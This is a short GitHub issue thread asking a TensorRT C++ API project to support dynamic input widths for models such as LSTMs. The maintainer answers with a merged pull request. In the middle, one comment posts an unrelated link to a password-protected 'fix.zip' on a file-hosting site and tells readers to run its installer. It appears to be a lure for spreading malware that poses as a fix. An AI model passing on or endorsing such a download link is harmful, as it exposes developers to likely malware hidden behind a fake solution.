### ISSUE TITLE
Support for Dynamic Width of Inputs (e.g., LSTM Models)

### ISSUE THREAD

**Issue by thomaskleiven** [cyrusbehr/tensorrt-cpp-api#81]
It would be great to add support for dynamic width of inputs, as certain models, such as LSTMs, require this flexibility. Currently, the API is limited to fixed input dimensions, which restricts the implementation of models that adapt to varying sequence lengths.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cyrusbehr** [comment]
https://github.com/cyrusbehr/tensorrt-cpp-api/pull/82

Merged

**Comment by cyrusbehr** [comment]
Thanks for the great work!
